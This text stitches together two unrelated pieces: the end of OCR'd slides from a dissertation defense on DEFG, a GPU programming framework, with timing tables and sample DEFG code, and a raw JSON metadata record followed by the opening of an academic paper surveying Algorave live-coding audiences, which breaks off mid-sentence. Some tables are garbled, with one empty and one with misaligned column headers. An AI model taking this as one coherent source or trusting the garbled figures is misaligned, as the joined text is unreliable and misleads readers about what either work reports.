340,200 non-zero values** - **9 iterations** - **Norm value**: $\|/(A*R_n) - I\|$ Sample IMIIFLX Inversion Results <table> <thead> <tr> <th>Name</th> <th>Type</th> <th>Size</th> <th>Iterations</th> <th>Seconds</th> </tr> </thead> <tbody> <tr> <td>H2</td> <td>Hilbert</td> <td>2x2</td> <td>4</td> <td>0.018</td> </tr> <tr> <td>H12</td> <td>Hilbert</td> <td>12x12</td> <td>70</td> <td>0.089</td> </tr> <tr> <td>M500</td> <td>Generated</td> <td>500x500</td> <td>13</td> <td>0.259</td> </tr> <tr> <td>M8000</td> <td>Generated</td> <td>8000x8000</td> <td>17</td> <td>1380.320</td> </tr> <tr> <td>1138_bus</td> <td>Repository</td> <td>1138x1138</td> <td>14</td> <td>3.262</td> </tr> <tr> <td>Kuu</td> <td>Repository</td> <td>7102x7102</td> <td>9</td> <td>605.310</td> </tr> </tbody> </table> **Hydra’s NVIDIA T20 GPU** - Available RAM: 2.68 GB - Limits double-precision matrix size to just over 8,000 by 8,000 DEFG Generalization • HPC with GPUs – Note the Faber suggestions for GPU performance: • “Get the data on the GPU and leave it” • “Give the GPU enough work to do” • “Focus on data reuse to avoid memory limits” – The CPU becomes the *orchestrator* • DEFG provides the CPU code to orchestrate – Declarations to describe the data – Design patterns to describe the orchestration – Optimization to minimize the data transfers Dissertation Accomplishments • Designed, Implemented, and Tested DEFG • Created DEFG’s Design Patterns • Compared DEFG to Hand-Written Applications – DEFG required less code – DEFG produced equal or better run times • Applied DEFG to Diverse GPU Applications – Each application fully implemented – Good application results Future Research • Additional DEFG Design Patterns – Multiple-GPU load balancing – Resource sharing • GPU-side declarative approach • DEFG Enhancements – Internal DSL, in addition to existing external DSL • More-standard programming environment • Enable support of more environments – Technical improvements • Better CPU RAM management • Additional collection of run-time statistics • DEFG Support for NVIDIA’s CUDA References Additional Slides DEFG Implementation Metrics • Lines of Code – ANTLR-based parser: 580 lines – Optimizer: 660 lines of Java – Code Generator: 1,500 lines of C++ – Templates and includes: 1,500 lines of C++ • Testing investment: 20% of total effort – Issues tended to be in the C/C++ code generation – Most were in multi-GPU buffer management ## Raw Performance Numbers for Three Applications, in Milliseconds <table> <thead> <tr> <th></th> <th>CPU</th> <th>GPU-Tesla T20</th> </tr> </thead> <tbody> <tr> <td></td> <td>DEFG</td> <td>Ref.</td> </tr> <tr> <td>BFS-4096</td> <td>1.5</td> <td>2.6</td> </tr> <tr> <td>BFS-65536</td> <td>12.3</td> <td>14.2</td> </tr> <tr> <td>FW</td> <td>111.8</td> <td>152.0</td> </tr> <tr> <td>SOBEL</td> <td>23.0</td> <td>24.8</td> </tr> </tbody> </table> Sample DEFG Code Showing a Sequence 01. declare application floydwarshall 02. declare integer NODE_CNT (0) 03. declare integer BUF_SIZE (0) 04. declare gpu gpuone ( any ) 05. declare kernel floydWarshallPass FloydWarshall_Kernels ( [[ 2D,NODE_CNT ]]) 06. declare integer buffer buffer1 ( BUF_SIZE ) 07. integer buffer buffer2 ( BUF_SIZE ) 08. call init_input (buffer1(in) buffer2(in) NODE_CNT(out) BUF_SIZE(out)) 09. sequence NODE_CNT times 10. execute run1 floydWarshallPass ( buffer1(inout) buffer2(out) NODE_CNT(in) DEFG_CNT(in) ) 11. call disp_output (buffer1(in) buffer2(in) NODE_CNT(in)) 12. end declare application bfs declare integer NODE_CNT (0) declare integer EDGE_CNT (0) declare integer STOP (0) declare gpu gpuone ( any ) declare kernel kernel1 bfs_kernel ( [[ 1D,NODE_CNT ]] ) kernel kernel2 bfs_kernel ( [[ 1D,NODE_CNT ]] ) declare struct (4) buffer graph_nodes ( NODE_CNT ) integer buffer graph_edges ( EDGE_CNT ) integer buffer graph_mask ( NODE_CNT ) integer buffer updating_graph_mask ( $NODE_CNT ) integer buffer graph_visited ( NODE_CNT ) integer buffer cost ( NODE_CNT ) // note: init_input handles setting "source" node call init_input (graph_nodes(out) graph_edges(out) graph_mask(out) updating_graph_mask(out) graph_visited (out) cost (out) NODE_CNT(out) EDGE_CNT(out)) loop execute part1 kernel1 ( graph_nodes(in) graph_edges(in) graph_mask(in) updating_graph_mask(out) graph_visited(in) cost(inout) $NODE_CNT(in) ) // set STOP to zero each time thru... set STOP (0) // note: STOP value is returned... execute part2 kernel2 ( graph_mask(inout) updating_graph_mask(inout) graph_visited(inout) STOP(inout) NODE_CNT(in) ) while STOP eq 1 call disp_output (cost(in) NODE_CNT(in)) end ### Table 5.13: Sort Run Times on Hydra with $2^{26}$ Items, in Seconds <table> <thead> <tr> <th></th> <th></th> <th></th> <th></th> <th></th> <th></th> </tr> </thead> <tbody> <tr> <td>Qsort</td> <td>8.394</td> <td>8.008</td> <td>7.972</td> <td>7.922</td> <td>7.890</td> </tr> <tr> <td>Rsort</td> <td>2.527</td> <td>11.216</td> <td>15.360</td> <td>17.120</td> <td>29.556</td> </tr> <tr> <td>RsortM</td> <td>1.459</td> <td>6.487</td> <td>7.400</td> <td>11.189</td> <td>24.682</td> </tr> </tbody> </table> ### Table 5.14: Sort Run Times on Hydra with $2^{27}$ Items, in Seconds |--------------|-----------|-------------|-------------|-------------|-------------| # IMIFLX Data ## Table 5.16: IMIFLX Inversion Results for Various Matrices <table> <thead> <tr> <th>Cnt</th> <th>Matrix Name</th> <th>Type</th> <th>Size</th> <th>Epilon</th> <th>Iterations</th> <th>Run Time Seconds</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>H2</td> <td>Hilbert</td> <td>2x2</td> <td>0.000001</td> <td>4</td> <td>0.018</td> </tr> <tr> <td>2</td> <td>H3</td> <td>Hilbert</td> <td>3x3</td> <td>0.000001</td> <td>8</td> <td>0.022</td> </tr> <tr> <td>3</td> <td>H4</td> <td>Hilbert</td> <td>4x4</td> <td>0.000001</td> <td>12</td> <td>0.023</td> </tr> <tr> <td>4</td> <td>H5</td> <td>Hilbert</td> <td>5x5</td> <td>0.000001</td> <td>15</td> <td>0.030</td> </tr> <tr> <td>5</td> <td>H6</td> <td>Hilbert</td> <td>6x6</td> <td>0.000001</td> <td>18</td> <td>0.034</td> </tr> <tr> <td>6</td> <td>H7</td> <td>Hilbert</td> <td>7x7</td> <td>0.000001</td> <td>21</td> <td>0.036</td> </tr> <tr> <td>7</td> <td>H8</td> <td>Hilbert</td> <td>8x8</td> <td>0.000001</td> <td>24</td> <td>0.037</td> </tr> <tr> <td>8</td> <td>H9</td> <td>Hilbert</td> <td>9x9</td> <td>0.000001</td> <td>27</td> <td>0.042</td> </tr> <tr> <td>9</td> <td>H10</td> <td>Hilbert</td> <td>10x10</td> <td>0.001</td> <td>30</td> <td>0.035</td> </tr> <tr> <td>10</td> <td>H11</td> <td>Hilbert</td> <td>11x11</td> <td>0.005</td> <td>40</td> <td>0.057</td> </tr> <tr> <td>11</td> <td>H12</td> <td>Hilbert</td> <td>12x12</td> <td>0.15</td> <td>70</td> <td>0.089</td> </tr> <tr> <td>12</td> <td>H13</td> <td>Hilbert</td> <td>13x13</td> <td>n.a.</td> <td>n.a.</td> <td>#INF error</td> </tr> <tr> <td>13</td> <td>M500</td> <td>Invertible</td> <td>500x500</td> <td>0.000001</td> <td>13</td> <td>0.259</td> </tr> <tr> <td>13a</td> <td>M500</td> <td>Invt-AnyTime</td> <td>500x500</td> <td>0.000001</td> <td>10</td> <td>0.206</td> </tr> <tr> <td>14</td> <td>M1000</td> <td>Invertible</td> <td>1000x1000</td> <td>0.000001</td> <td>14</td> <td>2.112</td> </tr> <tr> <td>15</td> <td>M5000</td> <td>Invertible</td> <td>5000x5000</td> <td>0.000001</td> <td>16</td> <td>329.619</td> </tr> <tr> <td>16</td> <td>M8000</td> <td>Invertible</td> <td>8000x8000</td> <td>0.000001</td> <td>17</td> <td>1380.320</td> </tr> <tr> <td>17</td> <td>M8500</td> <td>Invertible</td> <td>8500x8500</td> <td>n.a.</td> <td>n.a.</td> <td>error -4</td> </tr> <tr> <td>18</td> <td>685_bus</td> <td>Repository</td> <td>685x685</td> <td>0.000001</td> <td>12</td> <td>0.665</td> </tr> <tr> <td>19</td> <td>1138_bus</td> <td>Repository</td> <td>1138x1138</td> <td>0.000001</td> <td>14</td> <td>3.262</td> </tr> <tr> <td>20</td> <td>Kuu</td> <td>Repository</td> <td>7102x7102</td> <td>0.000001</td> <td>9</td> <td>605.310</td> </tr> </tbody> </table> # DEFG 4-Way Mini-Experiment SpeedUp <table> <thead> <tr> <th>GPUs</th> <th>SpeedUp</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>1</td> </tr> <tr> <td>2</td> <td>1.947</td> </tr> <tr> <td>4</td> <td>3.622</td> </tr> </tbody> </table> ![Graph of 4-GPU SpeedUp](image)
{"Source-Url": "http://cse.ucdenver.edu:80/~rsenser/aaDefensePresentationFinal.pdf", "len_cl100k_base": 6961, "olmocr-version": "0.1.53", "pdf-total-pages": 51, "total-fallback-pages": 0, "total-input-tokens": 78561, "total-output-tokens": 9360, "length": "2e12", "weborganizer": {"__label__adult": 0.0005021095275878906, "__label__art_design": 0.0008535385131835938, "__label__crime_law": 0.0005497932434082031, "__label__education_jobs": 0.002193450927734375, "__label__entertainment": 0.0001494884490966797, "__label__fashion_beauty": 0.0002899169921875, "__label__finance_business": 0.0002894401550292969, "__label__food_dining": 0.0003986358642578125, "__label__games": 0.0011138916015625, "__label__hardware": 0.006679534912109375, "__label__health": 0.0008707046508789062, "__label__history": 0.0004887580871582031, "__label__home_hobbies": 0.00020825862884521484, "__label__industrial": 0.0010423660278320312, "__label__literature": 0.0003075599670410156, "__label__politics": 0.0003859996795654297, "__label__religion": 0.0007643699645996094, "__label__science_tech": 0.3369140625, "__label__social_life": 0.00013446807861328125, "__label__software": 0.00965118408203125, "__label__software_dev": 0.63427734375, "__label__sports_fitness": 0.0005936622619628906, "__label__transportation": 0.0010213851928710938, "__label__travel": 0.0002551078796386719}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 24773, 0.03248]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 24773, 0.1752]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 24773, 0.74044]], "google_gemma-3-12b-it_contains_pii": [[0, 184, false], [184, 572, null], [572, 1031, null], [1031, 1482, null], [1482, 1806, null], [1806, 2250, null], [2250, 2733, null], [2733, 3244, null], [3244, 3686, null], [3686, 3940, null], [3940, 5027, null], [5027, 5603, null], [5603, 6205, null], [6205, 6707, null], [6707, 6989, null], [6989, 7288, null], [7288, 7681, null], [7681, 7916, null], [7916, 8322, null], [8322, 8771, null], [8771, 9110, null], [9110, 9713, null], [9713, 10002, null], [10002, 10583, null], [10583, 10646, null], [10646, 10794, null], [10794, 11307, null], [11307, 11715, null], [11715, 12067, null], [12067, 12521, null], [12521, 12924, null], [12924, 13474, null], [13474, 13953, null], [13953, 14286, null], [14286, 14529, null], [14529, 14769, null], [14769, 15291, null], [15291, 15473, null], [15473, 16119, null], [16119, 16563, null], [16563, 16898, null], [16898, 17341, null], [17341, 18926, null], [18926, 18944, null], [18944, 19300, null], [19300, 19704, null], [19704, 20307, null], [20307, 21479, null], [21479, 22391, null], [22391, 24607, null], [24607, 24773, null]], "google_gemma-3-12b-it_is_public_document": [[0, 184, true], [184, 572, null], [572, 1031, null], [1031, 1482, null], [1482, 1806, null], [1806, 2250, null], [2250, 2733, null], [2733, 3244, null], [3244, 3686, null], [3686, 3940, null], [3940, 5027, null], [5027, 5603, null], [5603, 6205, null], [6205, 6707, null], [6707, 6989, null], [6989, 7288, null], [7288, 7681, null], [7681, 7916, null], [7916, 8322, null], [8322, 8771, null], [8771, 9110, null], [9110, 9713, null], [9713, 10002, null], [10002, 10583, null], [10583, 10646, null], [10646, 10794, null], [10794, 11307, null], [11307, 11715, null], [11715, 12067, null], [12067, 12521, null], [12521, 12924, null], [12924, 13474, null], [13474, 13953, null], [13953, 14286, null], [14286, 14529, null], [14529, 14769, null], [14769, 15291, null], [15291, 15473, null], [15473, 16119, null], [16119, 16563, null], [16563, 16898, null], [16898, 17341, null], [17341, 18926, null], [18926, 18944, null], [18944, 19300, null], [19300, 19704, null], [19704, 20307, null], [20307, 21479, null], [21479, 22391, null], [22391, 24607, null], [24607, 24773, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 24773, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 24773, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 24773, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 24773, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 24773, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 24773, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 24773, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 24773, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 24773, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 24773, null]], "pdf_page_numbers": [[0, 184, 1], [184, 572, 2], [572, 1031, 3], [1031, 1482, 4], [1482, 1806, 5], [1806, 2250, 6], [2250, 2733, 7], [2733, 3244, 8], [3244, 3686, 9], [3686, 3940, 10], [3940, 5027, 11], [5027, 5603, 12], [5603, 6205, 13], [6205, 6707, 14], [6707, 6989, 15], [6989, 7288, 16], [7288, 7681, 17], [7681, 7916, 18], [7916, 8322, 19], [8322, 8771, 20], [8771, 9110, 21], [9110, 9713, 22], [9713, 10002, 23], [10002, 10583, 24], [10583, 10646, 25], [10646, 10794, 26], [10794, 11307, 27], [11307, 11715, 28], [11715, 12067, 29], [12067, 12521, 30], [12521, 12924, 31], [12924, 13474, 32], [13474, 13953, 33], [13953, 14286, 34], [14286, 14529, 35], [14529, 14769, 36], [14769, 15291, 37], [15291, 15473, 38], [15473, 16119, 39], [16119, 16563, 40], [16563, 16898, 41], [16898, 17341, 42], [17341, 18926, 43], [18926, 18944, 44], [18944, 19300, 45], [19300, 19704, 46], [19704, 20307, 47], [20307, 21479, 48], [21479, 22391, 49], [22391, 24607, 50], [24607, 24773, 51]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 24773, 0.09139]]}
olmocr_science_pdfs
2024-12-08
2024-12-08
0b149f71d524d2e4cb59fdf6f25636cf22d7d151
This is a repository copy of *Understanding live coding events*. White Rose Research Online URL for this paper: http://eprints.whiterose.ac.uk/109223/ Version: Accepted Version **Article:** https://doi.org/10.1080/14794713.2016.1227596 © 2016, Informa UK Limited, trading as Taylor & Francis Group. This is an Accepted Manuscript of a paper published in International Journal of Performance Arts and Digital Media on 6 Dec 2016, available online at: https://doi.org/10.1080/14794713.2016.1227596. Uploaded in accordance with the publisher's self-archiving policy. **Reuse** Unless indicated otherwise, fulltext items are protected by copyright with all rights reserved. The copyright exception in section 29 of the Copyright, Designs and Patents Act 1988 allows the making of a single copy solely for the purpose of non-commercial research or private study within the limits of fair dealing. The publisher or other rights-holder may allow further reproduction and re-use of this version - refer to the White Rose Research Online record for this item. Where records identify the publisher as the copyright holder, users can verify any specific terms of use on the publisher's website. **Takedown** If you consider content in White Rose Research Online to be in breach of UK law, please notify us by emailing eprints@whiterose.ac.uk including the URL of the record and the reason for the withdrawal request. Understanding live coding events K. Burland* & A. McLean School of Music, University of Leeds, UK Karen Burland is Associate Professor of music psychology and Head of the School of Music at the University of Leeds. Her research interests relate to musical identities, the career transitions of musicians and on live music audiences and she supervises doctoral work primarily in these areas. She is currently a university student education fellow and is investigating the ways in which undergraduate and postgraduate students engage with, and perceive, employability activities during university and beyond. Her book Coughing and Clapping: Investigating Audience Experience, edited with Stephanie Pitts, was published in December 2014. Karen has published widely in well-respected journals and has participated in numerous interdisciplinary research collaborations. Karen’s more recent research focuses on ecological approaches to creativity, understanding interaction and creativity in studio collaborations, investigations into the impact of institutional values on musicians’ psychological and musical development, in addition to on-going concerns with audience research. Alex McLean is a live coding musician, digital artist and interdisciplinary researcher based in Sheffield, UK. He is currently completing a research and teaching fellowship at the School of Music, University of Leeds, and beginning work on the five-year PENelope project lead by Dr Ellen Harlizius-Klück, at the Deutsches Museum Research Institute, investigating weaving as technical mode of existence. Alex is active across the digital arts, including co-founding the TOPLAP and Algorave live coding movements, the international conferences on Live Interfaces (ICLI) and Live Coding (ICLC), the Sonic Pattern symposia, the Festival of Algorithmic and Mechanical Movement, and the Dorkbot electronic art meetings in Sheffield and London. He also created the TidalCycles live coding environment, now an active free/open source project. *Corresponding author. Email: k.burland@leeds.ac.uk Abstract As an arts practice, live coding has strong roots in musical performance, and the fact that its ‘liveness’ requires the performer to write and modify algorithms in real time (Collins et al, 2003) means that it is often treated as a kind of music improvisation. Organised live coding has now passed its tenth year (Magnusson, 2014), and during this decade it has been manifested in a variety of contexts. Whilst there is a growing body of research addressing aspects of live coding from the coder’s perspective, little is known about the audiences for these events. This paper seeks to explore the motivations, experiences, and responses of live coding audiences and to examine their perceptions of the role and impact of the projected source code during live coding events. We aim to shed new light on the role of openness and technology in live coding performances, providing rich context for fuller understanding of this emerging practice and its impact on audience experience. Keywords Live coding, audience, Algorave, community, learning, code, multimodal Live coding and audience experience The central tenet of live coding is the composer-programmer’s execution of sophisticated algorithmic programme skills, musical knowledge and judgement, and the use of mathematical knowledge, experience, and practice to create virtuosic scripting languages and algorithmic techniques. Live coding involves a risky act of real time programming. It involves expertise in both field of music and mathematics. But one wonders how live coding and its creativities are judged by audiences? (Burnard, 2012, p.177) A recent surge in audience research highlights the range of factors which influence audience motivations to attend live music events and contribute to their experiences whilst they are there (Burland & Pitts, 2014). Much of this work focuses on classical music traditions (e.g. Dobson & Sloboda, 2014; Pitts, 2014), jazz (Burland & Pitts, 2012), or popular music (Bennett, 2014), but there has been little research to date which has explored audience experiences of live coding events. Much of the previous work relating to audiences suggests that, regardless of genre, audiences are motivated by high quality performances and value opportunities to be situated in close proximity to performers in order to observe the ways in which the instrument is played, or to feel as if they are fully immersed, and perhaps active, in the performance (Burland & Pitts, 2012; Pitts, 2005). Technical mastery and repertoire choices are key drivers for classical audiences (Pitts, 2005), whereas for musics like jazz, the unpredictability of the performance and the sense that they are witness to the creation of music in real time is exciting and appealing to its audiences (Burland & Pitts, 2012). In many ways, it would be logical to expect that much of the appeal of jazz performances also holds true for live coding... events; the music is often improvised, created in the moment, and the performers’ awareness of their surroundings can have an impact on the way in which the performance unfolds. One of the unique features of live coding performances, however, is the established practice of projecting code during events (Mori, 2015; Blackwell, 2015); in most other musics the score is hidden from the audience (it is either visible to the performer/s only, or is memorised in advance of the performance) and therefore the process of musical creation is partially hidden. Blackwell (2015) describes the modes by which users engage with code, suggesting that their activities relate to interpretation, construction and collaboration and that patterns of use differ according to perspective (e.g., performer, audience). The implication, therefore, is that the projected code is an important part of the audience’s experience and this is reflected in TOPLAP’s (2004) manifesto which asks for ‘access to the performer’s mind, to the whole human instrument…show us your screens…the code should be seen as well as heard’. What we do not know, however, is who attends live coding performances and what their motivations to attend might be. We also do not know the extent to which the code contributes to, or detracts from, the audience experience. Is the projected code a pure enhancement to a live coding performance, or are there occasions when it can deter an audience? Are there optimal conditions for the projected screen during live performances? And what role does the coder him/herself play in the audience’s experience of the performance? Researching live coding events In order to explore the motivations and experiences of audiences at live coding events, an online survey was created and advertised at a range of Algorave events and on social media over a three-month period, in order to encourage a wide response. As a set of techniques, live coding is not tied to any particular genre, but the current surge in popularity of well attended Algorave-style events provides an opportunity to gain significant understanding of audience response to live coding. However, we should note that this will give a strong bias towards audience responses to algorithmic dance music in particular. Eighty-three participants completed the survey (66 male, 16 female, 1 other) and the majority of participants were aged 18-45 years. A combination of multiple choice and open-ended questions focused on motivations to attend live coding performances, experiences at events and the impact of the projected live code. General musical interests and participation in other live music events were also explored (see Appendix). Specifically, we had three main research questions: 1. Why do people choose to attend live coding events? 2. What is the role and impact of the source code? 3. What is the audience’s response to music being visibly created in the moment? Quantitative data were analysed using descriptive and inferential statistics, and qualitative comments were analysed using Thematic Analysis (Braun & Clarke, 2006). Indicative quotes are used to support the emerging argument and participant identifiers are indicated by a label such as P1. --- 1 An algorave is defined as embracing ‘the alien sounds of the raves from the past, and introduc[ing] alien, futuristic rhythms and beats made through strange, algorithm-aided processes’ (Algorave.com/about, n.d.) Who attends live coding events? As described above, our audience respondents were primarily male (76%) and aged between 18 and 45 years. The age of the respondents is perhaps unsurprising, especially given a recent survey by The Nielsen Company (2014) which confirms that listeners to electronic dance music (EDM) in the US are aged between 18 and 49 years, the largest majority belonging to the 18-24 year category. As Figure 1 below suggests, however, audiences for live coding events are slightly older than for more mainstream EDM events. One explanation for this may relate to the nature of live coding events, which perhaps demand something more from their audiences: as discussed in the introduction, the projected code plays an important role in live coding performances and so it is possible that individuals with prior experience of coding or computer programming are particularly attracted to the events (more on this below). Indeed, this suggestion that prior experience motivates attendance is supported by examining the range of respondent professions; 22% worked in 'IT development' and were software/hardware/web developers and many of the ‘academic’ and ‘student’ respondents also identified themselves as having interests in coding – either as part of their work or as a pastime. What motivates audiences to attend live coding events? The survey asked respondents about the factors that motivate them to attend and to choose particular events, and these can be seen in Figures 3 and 4 below. It was clear from the open- ended questions that opportunities to attend live coding events were infrequent but that the respondents were keen to attend as often as possible. Since the respondents were generally knowledgeable about either the music or the technology involved, they made choices to attend based on their self-identities as coding enthusiasts; their identities were developed through enjoyable previous experiences and their knowledge of the music, its artists and practices which facilitated greater immersion in the culture of live coding events. [Insert] Figure 3. Graph showing factors which motivate audiences to attend live coding events [Insert] Figure 4. Graph showing the factors influencing choice of particular events Chi-square analyses of the data suggest that of all of the factors above, there are significant relationships between attendance and the following four factors: liking the artist ($X^2 (1, N=83) = 5.71, p=.017$), enjoying high quality music ($X^2 (1, N=83) = 9.44, p=.002$), enjoying previous events ($X^2 (1, N=83) = 16.11, p<.001$) and being a coding performer ($X^2 (1, N=83) = 5.19, p=.023$). These data further highlight the impact of prior knowledge and skills on motivation to attend live coding events. There was also a relationship between attendance and a lack of desire to try something new ($X^2 (1, N=83) = 4.27, p=.04$), suggesting firstly that audience members identify strongly with live coding events/practices, are clear about their expectations for such events based on their previous experiences (and therefore these are not new experiences any more) and secondly, that a general openness to new experiences does not necessarily characterise a typical audience member – this has to be supplemented by other knowledge or skills. The most significant result above, however, relates to having enjoyed previous events; this finding suggests that there is something special about audience experiences during live coding performances that ‘hooks’ the audience and instils a sense of commitment and enthusiasm. Experiencing live coding events Given the profile of the audience considered so far, it is perhaps unsurprising that their enjoyment of live coding performances relates to the nature of the music itself – to its experimental and unpredictable nature, and therefore its sense of being new and unique – as well as to social factors, such as community and learning. In addition to these broad factors, the projected code itself has an additional and important role to play, which will be discussed in further detail below. The code, learning and community There is a clear sense from the data that live coding events were characterised by being both ‘cool’ and ‘geeky’ at the same time; these are events which capture the individual’s imagination and demand intellectual engagement. For example, one respondent stated: ‘I find live coding cool, I’m almost mesmerised watching the screen with the code on it and hearing the changes in the music from that’ (P82). Live coding audiences appear to expect (and value) the opportunity to trace the music’s development by watching the code and hearing resultant changes. This is quite unlike other kinds of musical performances, where the musical score is usually only viewed by the performer (e.g. in classical music) or is fully prepared (or scripted) in advance of the performance (example, some popular music performances) and this suggests that the processual transparency afforded by the projected code enhances the experience for the audience (there is more discussion about this below). Seeing the projected code provides a connection between the performer and the audience; it provides opportunities to admire the performer (‘it’s like watching a top guitarist do his thing – but with a keyboard. A computer keyboard’ (P83)), to observe the performer’s commitment and emotional engagement (‘strange form of music performance that...represents the ‘suffering’ of the performers trying to produce something satisfying’ (P41)) and it provides opportunities for learning; for example, one respondent stated that she enjoyed ‘meeting interesting like-minded people and [learning] how different people make different noises with code’ (P6). There is frequent mention of the opportunities to ‘learn about new possibilities’ (P34) during live coding performances and this highlights that, for the informed audience member, the chance to develop skills and to gain ‘inspiration/ideas for my own projects’ (P24) is a fundamental feature of the live experience of coded music (cf. Guzdial, 2013). The community of ‘like-minded people’ (see P6 above) was also an important part of the audience experience. One of the questions in the survey asked respondents to describe a typical audience member and most responded with comments such as ‘geeky’, ‘nerds’, ‘open-minded and curious’ and ‘cool, polite and tidy’ (!). Perhaps more importantly, most respondents considered themselves to fit the typical profile ‘like a glove’ (apart from women and older respondents who jokingly acknowledged their atypicality in this context). It is possible that perceptions of an open and like-minded community encourages the possibility of sharing and learning and encourages subsequent attendance and future involvement in coding at home or as performers. **Unique and unpredictable experiences** Like audiences at jazz events (cf. Burland and Pitts, 2012), live coding audiences value the unpredictable nature of the events. Comments about ‘the geekery and haphazard nature of the performance’ (P8) and the ‘presence of the unexpected’ (P12) were frequent and relate in part to the technology involved: ‘[It] is really ‘live’, not a playback of prepared files. It can go wrong. It’s improvised. It’s bleeding edge technology’ (P21). In many ways it is difficult to have expectations for the performances, other than that they might be unpredictable, and it is this which appeals to the audience members: ‘The unpredictability of live coding and generative music/visuals [is appealing], I don’t enjoy going to performances where I know what to expect (from myself and from other performers)’ (P43). The sense that the experience is unpredictable for performer and audience alike strengthens the sense of community described above, but also distinguishes what is special about live as opposed to recorded listening. There is a sense that audience and performer co-create the performance as the performer is able to react in real time to the feedback from the audience. There is also unpredictability in the kind of music to expect at a live coding event; whilst the music sits comfortably within the context of EDM, it is a versatile style of music: ‘I like the style of music; although it’s a ‘bleeding edge’ form in the sense that many are doing stuff with networks, bespoke computer music languages, new controllers and the like, the music can often be quite happily rooted in genre: house, techno, noise, ambient and similar. It appeals to my taste’ (P81). In trying to establish what the experience of live coding performance is like for its audiences, it is clear that the liveness of the music, and the unpredictability of the music and its technologies, contribute to the enjoyment of the event. However, this is enhanced by the broader context of being able ‘to witness the future of music’ (P50) or ‘the next big thing’ (P53). **Experimental and new music** There is frequent reference in the data to live coding being a new music which is constantly evolving and pushing the boundaries of live music performance. Part of the appeal is that performances provide opportunities to see ‘how live coders push the state of the art’ (P11) and ‘a new mechanism for expression being experimented with’ (P15). Interestingly, this is not just about a music in development, but also about the act of performance and ‘seeing a music movement in development, and the opportunities to open up that performer/audience barrier in new ways, which live coding affords’ (P45). Obviously, the awareness of the originality or uniqueness of live coding relies on a certain contextual knowledge. Therefore, it is hardly surprising that the demographic of the audiences is as depicted above, nor that the respondents value and appreciate the technical aspects of the craft. There are parallels here, however, with audiences for other musics which can be seen as new or improvised – the work by Pitts and Gross (2015) with Contemporary Music/Art organisations also describes audiences as similarly open-minded about innovative artistic practices, and Burland’s work with free improvisers (Burland and Windsor, 2014) and jazz audiences (Burland and Pitts, 2012) also highlights the appeal of witnessing spontaneous music creation. Therefore, one suggestion is that audiences are attracted to musics where their involvement in the musical experience can potentially have an impact on the creation of the music in real time, but where there is some unpredictability about the extent to which that might be successful or not! **Engaging with the code** As previously discussed, one of the most significant differences between live coding events and other live performances is the presence of the projected code (or the ‘score’ for other musics). Whilst engagement with the ‘score’ is not expected in other musics, here the code plays a vital role in the audience’s experience, and consequently live coding performances are enhanced by their multimodality. **Multimodal experience: enjoyment vs. distraction** For many individuals, the projected code enhances enjoyment of the event: ‘It’s cool. Curiosity to understand the code underneath the music is a fun experience. It’s something new, not really seen elsewhere. The changing of code as a visualisation seems to ‘fit’ the entire K. Burland and A. McLean Understanding live coding events The ‘unique aesthetic’ (P75) of the code also enhances the event in other ways, adding ‘intimacy to the performance that is different from traditional music: there is a more direct connection what the performer is doing and thinking’ (P75). Other individuals value the projected code because they do not perceive the music to be complex or engaging. For example one respondent stated that ‘[The code] must be shown. If not I find these events to get boring quickly because the generated music usually has little change over time’ (P26) and another that ‘[The code is] very helpful for me to appreciate the event, especially when the musical quality is not up to my standards’ (P33). The multimodal experience created by the projected code serves to enhance appreciation of the experience and to provide another source of enjoyment. For some participants the code, rather than the performer, is described as the focus of the their attention: this contradicts Perera’s (2013) suggestion that ‘as with any performance, a live coding audience focuses their attention on the performer or ensemble. An algorave places the programmer–musician centre stage, as a traditional clubnight does a DJ’ (p.140). It is well reported in other contexts that being able to see a performer in close proximity enhances the live performance experience (cf. Burland & Pitts, 2012) and in many ways, the code allows a musician to demonstrate ‘their playing technique through the act of performing, the projected code demonstrates visibly the craft of the live coder’ (P47) and therefore becomes a representation of the performer. As stated in the previous section, the code adds interest to the music as it provides additional insights into how the music is being created. For example, respondents stated that ‘[the code] is a big part of what makes live coding such a uniquely interesting art form’ (P23), and that ‘[t]he code is very important to me. It shows what the performer tries to accomplish’ (P21). The projected code facilitates learning and makes the creative process more transparent, and therefore adds value and meaning, and is an important part of the craft of live coding performance. However, the projected code was not always seen to contribute positively to the events. For example, some respondents suggested that the code had a negative impact on the overall atmosphere of an event: ‘I feel in the community there’s a real focus on deconstructing the code rather than dancing, which feels maybe detrimental for people who aren’t as invested in the coding aspect’ (P54). When the audience does not have a shared goal for their experience during a live performance, this can have a detrimental impact on individuals’ experiences. For example, Burland & Pitts (2014) suggest that a sense of being surrounded by likeminded others enhances experiences of live music performances and that instances where this is not fulfilled can detract from the event and in some instances prevent future attendance. There are indications that this is also true in a live coding context: ‘people often default to staring at the projection. I think it’s better when there are multiple projections, or the projections are at weird angles or projected over the performer, so it’s there but as part of the immersion rather than a presentation to be read’ (P25). Therefore, opportunities to ensure the code is displayed on screens around the venue may enhance the overall atmosphere as it allows movement away from a single locus of activity which might alienate a less knowledgeable audience member. Other respondents found constant focus on the code to be difficult: ‘it’s a lot like the frets of a guitar: occasionally I peer at them, appreciate the technical skills, try to understand a bit, but mostly I can’t focus on it’ (P25). These factors, as well as some of the more negative presentational aspects, such as the font being ‘too small to be 